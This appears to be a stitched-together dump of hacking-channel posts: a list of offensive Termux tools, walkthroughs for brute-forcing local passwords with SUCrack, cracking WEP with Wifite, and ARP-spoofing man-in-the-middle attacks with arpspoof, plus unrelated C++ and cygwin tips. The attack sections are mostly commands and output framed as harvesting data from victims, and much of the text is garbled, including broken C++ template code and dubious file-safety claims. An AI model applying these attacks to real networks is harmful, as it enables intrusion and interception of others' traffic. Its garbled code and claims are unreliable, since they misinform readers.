▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Termux-Linux Tools lastest Part 11 :
t.me/UndercOdeTesting

hdmi-sniff 5.f7fbc0e HDMI DDC (I2C) inspection tool. It is designed to demonstrate just how easy it is to recover HDCP
crypto keys from HDMI devices. https://github.com/ApertureLabsLtd/hdmi-sniff

heartbleed-honeypot 0.1 Script that listens on TCP port 443 and responds with completely bogus SSL heartbeat responses, unless it detects the start of a byte pattern similar to that used in Jared Stafford's http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt
hex2bin 1.0.7 Converts Motorola and Intel hex files to binary. http://hex2bin.sourceforge.net/
hexinject 1.5 A very versatile packet injector and sniffer that provides a command-line framework for raw network access. http://hexinject.sourceforge.net
hexorbase 6 A database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). https://code.google.com/p/hexorbase/
hharp 1beta This tool can perform man-in-the-middle and switch flooding attacks. It has 4 major functions, 3 of which attempt to man-in-the-middle one or more computers on a network with a passive method or flood type method. http://packetstormsecurity.com/files/81368/Hackers-Hideaway-ARP-Attack-Tool.html
hidattack 0.1 HID Attack (attacking HID host implementations) http://mulliner.org/bluetooth/hidattack.php
honeyd 1.6.7 A small daemon that creates virtual hosts on a network. https://github.com/DataSoft/Honeyd/
honssh 47.0de60ec A high-interaction Honey Pot solution designed to log all SSH communications between a client and server. https://code.google.com/p/honssh/
hookanalyser 3.0 A hook tool which can be potentially helpful in reversing applications and analyzing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. http://hookanalyser.blogspot.de/
host-extract 9 Ruby script tries to extract all IP/Host patterns in page response of a given URL and JavaScript/CSS files of that URL. https://code.google.com/p/host-extract/
hostbox-ssh 0.1.1 A ssh password/account scanner. http://stridsmanit.wordpress.com/2012/12/02/brute-forcing-passwords-with-hostbox-ssh-1-1/

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Rooted termux-linux tool airmon-ng suite (for all your wireless cracking needs)
twitter.com/UndercOdeTC

🦑 Requirements

1) tcpdump

2) libmproxy (packaged with zarp)

3) paramiko (SSH service)

4) nfqueue-bindings (packet modifier)

🦑 The recommended installation process is to run:

1) git clone git://github.com/hatRiot/zarp.git

2) pip install -r requirements.txt

3) You can then run:

4) sudo python zarp.py --update
to update zarp. The update flag will not work if you download the tarball from the Git page.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Scapy comes packaged with Zarp and no installation is required. Wifite is used for wireless AP cracking; a specific version (ballast-dev branch) is required.

> This comes packaged with zarp. There are some dependencies required for Scapy, but most should be pretty easy to install or already be installed.

🦑 Tool Overview
Broad categories are (see wiki for more information on these):

1) Poisoners

2) Denial of Service

3) Sniffers

4) Scanners

5) Services

6) Parameter

7) Attacks

🦑usage: zarp.py [-h] [-q FILTER] [--update] [--wap] [--ftp] [--http] [--smb]
[--ssh] [--telnet] [-w] [-s] [--service-scan]

optional arguments:
-h, --help show this help message and exit
-q FILTER Generic network sniff
--update Update Zarp

Services:
--wap Wireless access point
--ftp FTP server
--http HTTP Server
--smb SMB Service
--ssh SSH Server
--telnet Telnet server

Scanners:
-w Wireless AP Scan
-s Network scanner
--service-scan Service scanner
bryan@debdev:~/tools/zarp$

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Open Termux (you can download the application from google store)
>good pentesting package for termux
pinterest.com/UndercOdeOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) pkg install git

2) pkg install python

3) git clone https://github.com/thehackingsage/hacktronian.git

4) cd hacktronian

5) chmod +x hacktronian.py

6) python2 hacktronian.py

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Well You got Now more than 500 Termux-linux tools posted here

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Integrator.exe Virus, Process How it Works ?

Integrator.exe is an executable file that is part of the Auslogics BoostSpeed program developed by Auslogics Software Pty Ltd. The software is usually about 62.71 MB in size.
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Is Integrator.exe safe, or is it a virus or malware?

1) The first thing that will help you determine if a particular file is a legitimate Windows process or a virus, is the location of the executable itself. For example, a process like Integrator.exe should run from C:\Program Files\auslogics\auslogics boostspeed\boostspeed.exe and not elsewhere.

2)To confirm, open the Task Manager, go to View -> Select Columns and select "Image Path Name" to add a location column to your Task Manager. If you find a suspicious directory here, it may be a good idea to investigate this process further.

3) Another tool that can sometimes help you detect bad processes is Microsoft's Process Explorer. Start the program (it does not require installation) and activate "Check Legends" under Options. Now go to View -> Select Columns and add "Verified Signer" as one of the columns.

4) If the "Verified Signer" status of a process is listed as "Unable to Verify", you should take a moment look at the process. Not all good Windows processes have a Verified Signature label, but neither do any of the bad ones.

5) The most important facts about Integrator.exe:

>Located in C:\Program Files\Auslogics\Auslogics BoostSpeed\ subfolder;

>Publisher: Auslogics Software Pty Ltd

> Full Path: C:\Program Files\auslogics\auslogics boostspeed\boostspeed.exe

Help file: www.auslogics.com/en/support

Publisher URL: www.auslogics.com/en
Known to be up to 62.71 MB in size on most Windows;

6) If you had any difficulties with this executable, you should determine if it's trustworthy before deleting Integrator.exe. To do this, find this process in Task Manager.

7) Find its location (it should be in C:\Program Files\Auslogics\Auslogics BoostSpeed\) and compare the size etc with the above facts.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Can I remove or delete Integrator.exe?

You should not delete a safe executable file without a valid reason, as this may affect the performance of any associated programs that use that file. Be sure to keep your software and programs up to date to avoid future problems caused by corrupted files. With regard to software functionality issues, check driver and software updates more often, so there is little or no risk of such problems occurring.
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) According to various sources online, 69% of people remove this file, so it may be harmful, but it is recommended that you check the trustworthiness of this executable yourself to determine if it is safe or a virus. The best diagnosis for these suspicious files is a complete system analysis with Reimage. If the file is classified as malicious, these applications will also delete Integrator.exe and get rid of the associated malware.

2) However, if it is not a virus and you need to delete Integrator.exe, then you can uninstall Auslogics BoostSpeed from your computer using its uninstaller, which should be located at: "C:\Program Files\Auslogics\Auslogics BoostSpeed\unins000.exe". If you cannot find it's uninstaller, then you may need to uninstall Auslogics BoostSpeed to completely delete Integrator.exe. You can use the Add/Remove Program function in the Windows Control Panel.


1) In the Start menu (for Windows 8, right-click the screen's bottom-left corner), click Control Panel, and then under Programs:
o Windows Vista/7/8.1/10: Click Uninstall a Program.
o Windows XP: Click Add or Remove Programs.

2) When you find the program Auslogics BoostSpeed, click it, and then:
o Windows Vista/7/8.1/10: Click Uninstall.
o Windows XP: Click the Remove or Change/Remove tab (to the right of the program).

3) Follow the prompts to remove Auslogics BoostSpeed


@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Common Integrator.exe Virus error messages

The most common Integrator.exe errors that can appear are:

1) "Integrator.exe Application Error."

2) "Integrator.exe failed."

3) "Integrator.exe has encountered a problem and needs to close. We are sorry for the inconvenience."

4) "Integrator.exe is not a valid Win32 application."

5) "Integrator.exe is not running."

6) "Integrator.exe not found."

7) "Cannot find Integrator.exe."

8) "Error starting program: Integrator.exe."

9) "Faulting Application Path: Integrator.exe."
twitter.com/UndercOdeTes

🦑 These .exe error messages can occur during the installation of a program, during the execution of it's associate software program, Auslogics BoostSpeed, during the startup or shutdown of Windows, or even during the installation of the Windows operating system. Keeping a record of when and where your Integrator.exe error occurs is important information when it comes to troubleshooting.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to fix Integrator.exe > Speedup any windows-hidden trick :

A clean and tidy computer is one of the best ways to avoid problems with Auslogics BoostSpeed. This means performing malware scans, cleaning your hard disk with cleanmgr and sfc /scannow, uninstalling programs you no longer need, monitoring any auto-start programs (with msconfig), and enabling automatic Windows updates. Don't forget to always make regular backups or at least define recovery points.
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) If you have a bigger problem, try to remember the last thing you did or the last thing you installed before the problem.

2) Use the resmon command to identify the processes that are causing your problem. Even in case of serious problems, instead of reinstalling Windows, you should try to repair your installation or, in the case of

Windows 8-10 , by executing the command DISM.exe /Online /Cleanup-image /Restorehealth. This allows you to repair the operating system without data loss.

2) To help you analyze the Integrator.exe process on your computer, you may find the following programs useful: Security Task Manager displays all Windows tasks running, including built-in hidden processes such as keyboard and browser monitoring or auto-start entries. A single security risk rating indicates the probability that it is spyware, malware or a potential Trojan horse.

3) This anti-virus detects and removes spyware, adware, Trojans, keyloggers, malware and trackers from your hard disk.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Cracking Password for any local user-kali-parrot :
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Physical access attacks are similar to elevating users' rights.

2) That is, when an ordinary user logs in to the system, the passwords of other local user accounts are cracked.

2) In Linux, an ordinary user can perform certain operations on behalf of other users through the su command, which means that the user can elevate his permissions on Linux / Unix systems.

3) In this case, you can use the SUCrack tool to brute-force the password of the local user account using su to complete subsequent penetration attacks.

4) This section will introduce using SUCrack tool to attack this user.
SUCrack is a multi-threaded tool that allows users to brute force the password of a local user account using su. Several options commonly used by this tool are shown below.:

--help: View SUCrack's help file.

-l: Modify the user who attempts to attack the login.

-s: Sets the interval for displaying statistics. The default time is 3 seconds.

-a: Allows the user to set whether to use ANSI escape codes.

-w: is the number of threads available in SUCrack. Because SUCrack is
multi-threaded, users can specify the number of threads they want to run. It is recommended to use only one, because when each login attempt fails, the connection will be retried after a delay of 3 seconds.
[Example 8-8] Use SUCrack to crack the password of the local user. When using the SUCrack command, you need to specify a password file. Otherwise, you will get a funny prompt message. The execution command is as follows:

$ sucrack /usr/share/wordlists/wordlist.txt
password is: 123456

5) As you can see from the output, the password of the local user root is 123456. Because the su command is used, when no user is specified, the root user is used by default.

6) Therefore, after executing the above command, the password of root user root is cracked.

7) If the user wants to set two threads, display statistics every 6 seconds and want to set to use ANSI escape codes. The execution command is as follows:

$ sucrack -w 2 -s 6 -a /usr/share/wordlists/wordlist.txt

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Wirless -wifi attack-kali-parrot-debian-ubuntu (aslo root android)
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Wisdom Snipping Tool Kismet guide by Underc0de

> If you want to perform a wireless network penetration test, you must first scan all valid wireless access points. Just in Kali Linux, Kismet, a wireless network sniffing tool, is provided. Use this tool to measure the surrounding wireless signals and see all available wireless access points. This section will introduce sniffing wireless networks using Kismet tools.


1) Start Kismet tool. The execution command is as follows:

root@kali:~# kismet

2) Terminal extension

> This interface is used to set whether to use the default color of the terminal. Because Kismet's default color is gray, some terminals may not be displayed. Use the default colors here, select Yes, the interface will display

3) The interface prompts that the Kismet tool is running as the root user. At this time, select OK, and the interface will shown

4) The interface prompts whether to start the Kismet service automatically. Select Yes, the interface will shown

5) This interface displays some information for setting up Kismet service. Use the default settings here and select Start, the interface will shown

6) This interface displays package resources that have not been defined. Whether to add them now. Select Yes here, the interface will shown

7) Specify the wireless network card interface and description information on this interface. In Intf, enter the wireless network card interface. If the wireless network card is already in listening mode, you can enter wlan0 or mon0. Other information may not be added. Then click the Add button

8) Select the Close Console Window button on this interface, and the interface will be displayed.

9) The information displayed on this interface is that it is sniffing the signals in the wireless network. When running for a certain period of time, stop modifying. Click the Kismet menu option on this interface and select the Quit command

10) After pressing the Quit command

11) Stop Kismet service
Click Kill on this interface to stop Kismet service and exit terminal mode. At this point, the terminal will display some log information

12) the KISMET IS SHUTTING DOWN section you will see that several log files are closed.

> These log files are stored in the / root / directory by default. In these log files, the time when the log was generated is shown. These times are very helpful when running Kismet many times or days.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How analyse packages by kismet ?
instagram.com/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

analyze the data captured above:


1) Change to the / root / directory and use the ls command to view the log file generated above. The execution command is as follows:

2) root@kali:~# ls Kismet-20140723-17-19-48-1.*
Kismet-20140723-17-19-48-1.alert Kismet-20140723-17-19-48-1.netxml
Kismet-20140723-17-19-48-1.gpsxml Kismet-20140723-17-19-48-1.pcapdump
Kismet-20140723-17-19-48-1.nettxt

3) From the output, you can see that there are five log files with different suffix names. All information generated by the Kismet tool is stored in these files. The following describes the formats of these files.
alert: This file includes all warning messages.

4) gpsxml: If a GPS source is used, the relevant GPS data is saved in this file.

5) nettxt: Includes all collected text output information.

6) netxml: Includes all data in XML format.

7) pcapdump: Includes packets captured throughout the session.
The following mainly introduces the tools of PCAP and Text files.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Analyze the PCAP signal frame using Wireshark-root android require external wifi adapter >

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Start Wireshark. The execution command is as follows:
root@kali:~# wireshark &

2) Open the pcapdump file. Select the File | Open command in the menu bar of the Wireshark interface

Selecting the captured pcapdump file
3) Select the pcapdump file captured by the Kismet tool on this interface, and then click the "Open" button

> pcapdump file data packet1

4) From this interface, you can see all wireless network data packets scanned by Kismet. The Beacon package is a basic management package for wireless devices and is used to signal other services.

🦑 Analyze Kismet's Text File

1) In Linux, you can use various text editors to open the nettxt file, or use the cat command to view the file contents. Open the nettxt file using Linux's default text editor

2) nettxt file content

> From this interface, you can see that there is a lot of information in the nettxt file, which lists each wireless network scanned.

> >Each wireless network has a label and lists each client connected to these wireless networks

3) Client Information
From this interface, you can see a Client1 whose MAC address is 00: c1: 40: 76: 05: 6c. It indicates that a client with a MAC address of 00: c1: 40: 76: 05: 6c is connected to a wireless access point- examp[le

Well done !
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Using Wifite to Crack Wireless Networks-kali-parrot-debian-ubuntu-wifislax

<> Some programs for cracking wireless networks use the Aircrack-ng toolset and add a graphical interface or use a text menu to crack the wireless network. This makes it easier for users to use them without having to remember any commands. In this section, we will use the command line tool Wifite to scan and attack wireless networks.

1) Start wifite. The execution command is as follows:

302-01

2) Stop scanning the wireless network, and the following message will be displayed:

> 302-02
From the above information, you can see that 13 wireless access points were scanned as example

3) Select the target of the attack. select the any wireless access point, which is encrypted using WEP. Therefore, it should be relatively easy to attack, as shown below:

[+] select target numbers (1-13) separated by commas, or 'all': 2

[+] 1 target selected.

[0:10:00] preparing attack "Test" (14:E6:E4:AC:FB:20)

[0:10:00] attempting fake authentication (5/5)… failed

[0:10:00] attacking "Test" via arp-replay attack

[0:09:06] started cracking (over 10000 ivs)

[0:09:00] captured 12492 ivs @ 418 iv/sec

[0:09:00] cracked Test (14:E6:E4:AC:FB:20)! key: "6162636465"

[+] 1 attack completed:

[+] 1/1 WEP attacks succeeded

cracked Test (14:E6:E4:AC:FB:20), key: "6162636465"

[+] disabling monitor mode on mon0… done

[+] quitting

🦑 From the output information above, you can see that the attack was successful. Among them, the password of the Test wireless access point is 6162636465.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Attack router-full
The various tools introduced earlier are connected to the wireless network by directly cracking the password.

> Because of all the devices in a wireless network environment, the router is one of the most important devices. In order to protect the security of the router, users usually set a more complex password.

> Even some users may use the router's default username and password. However, there are some loopholes in the router itself. It may not be easy for users to get started with complex passwords.

> At this time, you can use the loopholes in the router itself to carry out attacks. This section will introduce the router attack using Routerpwn tool.

> Routerpwn is probably the easiest tool to use. It is used to look for loopholes in the router. Routerpwn is not included in Kali, it is just a website. Its official website address is http://routerpwn.com/
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>.Arpspoof tool

1) Arpspoof is a very good source code program for ARP spoofing. Its operation will not affect the communication of the entire network, the tool achieves deception by replacing the data in transmission. This section will introduce the use of Arpspoof tool.

2) URL Traffic Manipulation Attack
URL traffic operations are very similar to man-in-the-middle attacks, injecting routed traffic into the Internet through the target host. This process will attack through ARP injection.

3) This section will introduce the use of Arpspoof tools to implement URL traffic manipulation attacks. Use the Arpspoof tool to implement URL traffic manipulation attacks. The specific steps are as follows:

a) Turn on routing and forwarding. The execution command is as follows:

root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
After executing the above command, no information is output.

b) Start Arpspoof injection to attack the target system. The attack method is that the attacker (192.168.6.102) sends ARP packets to spoof the gateway (192.168.6.1) and the target system (192.168.6.101). The following first deceives the target system, and the execution command is as follows:

root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d

c) The output shows a packet sent by the attacker to the target host 192.168.6.102. 50: e5: 49: eb: 46: 8d represents the attacker's MAC address; 19: 21: 3f: c3: e5 represents the MAC address of 192.168.6.101. When the above process is successful, when the target host 192.168.6.101 sends data to the gateway 192.168.6.1, it will send it to the attacker 192.168.6.102.

d) Use Arpspoof to attack the gateway. The execution command is as f follows:

root@kali:~# arpspoof -i eth0 -t 192.168.6.1 192.168.6.101
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d

e) The ] output shows the packets sent by the attacker to the gateway 192.168.6.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How Verify the attack of Arpspoof tool by using Wireshark packet capture.
The specific operation steps are shown below.
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Start the Wireshark tool. On the Kali Linux desktop, select "Applications" | Kali Linux | Top 10 Security Tools | wireshark in order. The interface will be displayed.

2) Wireshark startup interface
Under the interface Start, select the interface to be captured. Select eth0 here, and then click the Start button

3) This interface can set related Wireshark settings and start, stop and refresh data packets.

4)) Ping the gateway 192.168.6.1 on the target system 192.168.6.101. The execution command is as follows:

C:\Users\Administrator>ping 192.168.6.1

5) Captured packets

> This interface shows the data transmission process between 192.168.6.101 and 192.168.6.1.

> The number of the entire transmission process is 28-33, 28-30 is a request packet process, and 31-33 is a target response packet process. The captured packets are analyzed in detail below:

28: indicates that 192.168.6.101 (source) sends a ping request to 192.168.6.1 (destination).

29: indicates that 192.168.6.102 forwards the data packet of 192.168.6.101.

30: indicates that 192.168.6.102 will forward the data packet and then send a request to 192.168.6.1.

31: The target host 192.168.6.1 responds to the request of 192.168.6.101.

32: indicates that the response was sent to 192.168.6.102, and the host

33: The destination host 192.168.6.1 sends the forwarded data to 192.168.6.101.

E N J O Y BY U N D E R C OD E

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑now you are able to attack and anylse wireshark-kismet packets- and spoofing- collecting data from victime

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Programming Techniques-Auto Jump
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

<!-
Make the page /index.html automatically jump to /its/index.html immediately after loading Page, the content of /index.html is as follows:
<html>
<head>
<meta http-equiv = "Content-Type" content = "text / html; charset = gb2312">
<meta http-equiv = "refresh" content = " 0, url = / its ">
</ head>
<body bgcolor =" # FFFFFF "text =" # 000000 ">
<a href="http://192.168.18.235/its"> Loading ... </a>
</ body>
</ html>
->
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Programming Techniques-Cross-platform Code Debugging by Underc0de :
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) In development, for code reuse, we always separate the core algorithm from the interface part, the
core algorithm It is generally written in C, and I hope that the code can be compiled and run on other platforms.

2) There is VC on Microsoft platform, and gcc on Unix and some embedded platforms (palm ...). If the code is written and then
ported, it will be uncomfortable enough. It is best to support it when writing code. If you work in the company, you can have more
machines, one with 2000, one with linux, the code has to be copied, or the server using Telnet.

3) If there is only one computer, it will be miserable. Install two operating systems. , Restart, switch operating system.

🦑 Here is a software that can solve this problem. The same source code under Windows is
compiled and debugged with VC and gcc at the same time. It is cygwin. I use vc, gcc.

1) Install cygwin.
First install cygwin. Cygwin is a cygnus.com product. Download it from its website and

install it directly on the Internet. Do n’t forget to select the gcc option during installation.

2) Code directory
My code directory is ZCore. The following are subdirectories. There are two subdirectories in the subdirectory Build:
VC and gcc hold the VC project files and gcc Makefile respectively; the subdirectory Src is the code directory; the
subdirectory Doc In the code is the Readme and other instructions (not used to Chinese comments in English code), the code
To be compiled into a static library. Needless to say the VC compilation environment, let's see how to set up a gcc compilation environment.
Makefile has to be written by myself, there is no Makefile auxiliary tool in my cygwin. Run cygwin.

3) Mapping the directory
We first mount the win32 directory into the posix directory, and run mount to view the original
mounted path. The path of my ZCore is: d: studyzcore, I want to map into / zcore, the
command is: "mount d: / study / zcore / zcore". There is a warning, but no problem. Now
using mount to view, there is one more. This information is stored in the registry
[HKEY_CURRENT_USERSoftwareCygnus SolutionsCygwinmounts v2 / zcore]
If you want to uninstall, use the command "umount / zcore".

4) , gcc compile
with "cd / zcore / build / gcc" into the compilation directory, make it.

In this way, you can use VC to compile with gcc when debugging code, and it will be easier to migrate to other environments in the future.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Programming Techniques-Defining Function Objects full by UndercOde :
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Although function pointers are widely used to implement function callbacks, C ++ also provides an important implementation of callback functions Method, that's the function object. Function objects (also called "operators") are ordinary class objects that override the "()" operator. So syntactically, function objects behave similarly to ordinary functions.

🦑 There are several advantages to using function objects instead of function pointers.

1) First, because objects can be modified internally without changing external interfaces, the design is more flexible and flexible.

2) Function objects also have data members that store the results of previous calls. When using ordinary functions, the results of previous calls need to be stored in global or local static variables, but global or local static variables have certain defects that we do not want to see.
Second, the compiler can implement inline calls in function objects, which further enhances performance.

3) This is almost impossible to achieve in function pointers.

The following example illustrates how to define and use function objects. First, declare a normal class and overload the "()" operator:

class Negate
{
public:
int operator () (int n) {return -n;}
}; In the

4) overloaded operation statement, remember the first circle Brackets are always empty because they represent overloaded operator names; the second parenthesis is a parameter list. Generally, when overloading an operator, the number of parameters is fixed, but when overloading the "()" operator, it is different. It can have any number of parameters.

Because the built-in operation in Negate is unary (only one operand), the overloaded "()" operator also has only one parameter. The return type is the same as the parameter type-in ​​this case, int. The function returns an integer with the opposite sign as the argument.

🦑 Using Function Objects

We now define a function called Callback () to test the function object. Callback () takes two parameters: one for int and one for a reference to the class Negate. Callback () treats the function object neg as a normal function name:

#include <iostream>
using std :: cout;

void Callback (int n, Negate & neg)
{
int val = neg (n); // Call the overloaded Operator "()"
cout << val;
} In

unnecessary code, note that neg is an object, not a function. The compiler translates the statement

int val = neg (n);

into

int val = neg.operator () (n);

Generally, function objects do not define constructors and destructors. Therefore, no problems occur during the creation and destruction process. As mentioned earlier, the compiler can inline overloaded operator code, so it avoids runtime problems related to function calls.

In order to complete the above example, we use the main function main () to implement the parameters of Callback ():

int main ()
{
Callback (5, Negate ()); // output-5
}

This example passes the integer 5 and a temporary Negate The object goes to Callback (), and the program outputs -5.

Template function object

As can be seen from the above example, its data type is limited to int, and universality is one of the advantages of function objects. How to create a function object with universality? The method is to use a template, i.e. the overloaded operator "()" is defined as a template class members, so that the function is suitable for any type of data objects: The double, _int64 or char:

class GenericNegate
{
public:
Template <class T> T operator () (T T) -t const {return;}
};

int main ()
{
GenericNegate o negate;
COUT << o negate (5.3333); // Double
COUT << o negate (10000000000i64); // the __int64
}

If ordinary It is quite difficult to implement the above flexibility with a callback function.

Function Objects in the